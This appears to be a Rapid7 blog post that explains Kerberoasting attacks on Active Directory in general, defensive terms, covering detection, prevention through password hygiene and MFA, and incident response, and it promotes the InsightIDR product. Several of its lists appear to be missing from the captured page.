A Kerberoasting attack is a way for attackers to obtain credentials for Active Directory accounts, and then leverage those credentials to steal data. The term Kerberoasting is a play on words, as it takes advantage of Kerberos, a network authentication protocol meant to ensure secure authentication requests between clients and services across an untrusted network like the internet.
During a Kerberoasting attack, a threat actor leverages stolen credentials to harvest encrypted messages and subsequently decrypt them offline. Making it more difficult for threat actors to gain access, i.e. escalating privileges, is a way to fend off a Kerberoasting attack, but it only takes compromising one user’s account for an attacker to gain access to credentials.
Kerberoasting attacks are prevalent because of the access granted to a user who is seen by the system as legitimate. Due to the lag time of the discovery of compromised or stolen credentials, the more time a threat actor can pose as a legitimate user of the network, the more time that person or group has to poke around and access/steal data as they please.
Indeed, the Cybersecurity Infrastructure and Security Agency (CISA) of the United States Government has said that Kerberoasting is one of the most time-efficient ways to elevate privileges and move laterally and unchecked throughout a network.
Kerberoasting attacks work by leveraging the Kerberos authentication protocol to:
Kerberoasting attacks don’t require an administrator account or even elevated privileges. In fact, one of the things that makes this type of attack particularly attractive is that any domain user account can be used because all accounts can request service tickets from the ticket granting server (TGS).
Once an attacker has access to a user’s account, they typically can log in to any workstation in that domain – specifically, workstations running services that require Kerberos-enabled service accounts.
Subsequent actions such as lateral movement and exfiltration can happen right “under the noses” of the entire security organization and business at large if an attacker is impersonating someone with elevated privileges; indeed, the elevated nature of an impersonation could leave the business extremely liable, even if the attacker is caught in a relatively short amount of time.
Unchecked lateral movement can be terrifying for any organization, which is why security tools to detect this subtly malicious and risky behavior sooner are becoming more consequential than ever.
There are many different executions of Kerberoasting attacks, so let's zoom in on the inner-workings of one execution in particular:
According to CISA, Kerberoasting is a preferred attack method of Russian state-sponsored Advanced Persistent Threat (APT) actors, with the perpetrators having performed the Kerberoasting attack methodology discussed above.
Once an attacker has gained access to a network under a properly credentialed profile, they theoretically can move laterally around a network with ease. In this way, it can be no small task detecting malicious activity – particularly with false-positive alerts constantly popping up – if the data theft is perpetrated with skill.
This high level of false positives is where solely aligning to MITRE recommendations can provide a challenge. In order to overcome this and filter out all of the excess noise, extra steps should be taken. Rapid7’s InsightIDR can help to achieve this by:
Preventing Kerberoasting attacks can be achieved in many ways, but the main one on which to focus would be ensuring good password hygiene organization-wide. It’s critical to use credentials generated at random as well as to lock up as tight as possible those accounts with escalated privileges.
Now, let’s turn our attention to proper response in the event an in-progress Kerberoasting attack is detected. Of course, it’s easy to imagine a worst-case scenario where the threat actor has impersonated a properly credentialed individual and has had access for far too long and potentially stolen far too much data.
Once a few deep breaths have been taken, the following steps can help launch a proper response:
MFA is one relatively easy way to avoid a Kerberoasting attack. Requiring multiple forms of authentication among multiple devices can help to fend off the bulk of attempted attacks. From an enterprise standpoint, the challenge will be pushing MFA software out to an entire employee base and hoping they adopt this critical practice of safeguarding the business.
Even though it seems like common knowledge to implement these rather simple security checks, there are still many businesses around the world that are lacking in proper password or credentialing hygiene practices like MFA.
It's disappointing and frightening when threat actors are able to turn a security protocol like Kerberos into a tool for stealing data. It doesn’t mean the tooling should be cast aside; indeed, Kerberos is a critical tool for keeping users safe and secure in a non-secure environment.
As mentioned above, implementing a detection tool to thwart threat actors early is an effective countermeasure that can keep this important authentication protocol safe. For instance, InsightIDR from Rapid7 can continuously baseline user activity so that suspicious activity is detected easier and faster.
It can also leverage external threat intelligence critical to detections beyond the network perimeter. This takes into account the nearest network endpoint to the depths of the Dark Web. Regardless of the product or solution a security organization chooses to employ in service of thwarting Kerberoasting and APT actors, it’s important to consider it’s easier than ever to infiltrate a network when masquerading as an employee.
How is this typically executed? Through stolen credentials, of course. That’s why it’s so important to continuously analyze user and entity behavior analytics (UEBA) to connect activity across a network to specific users. If a user behaves in a way that’s unusual, analysts see it fast and investigate. It could also be a real employee who – knowingly or unknowingly – presents some kind of risk.
Rapid7 Takes Next Step in AI Innovation with New AI-Powered Threat Detections
Learn more on how to Identify an Attack with Rapid7's Solution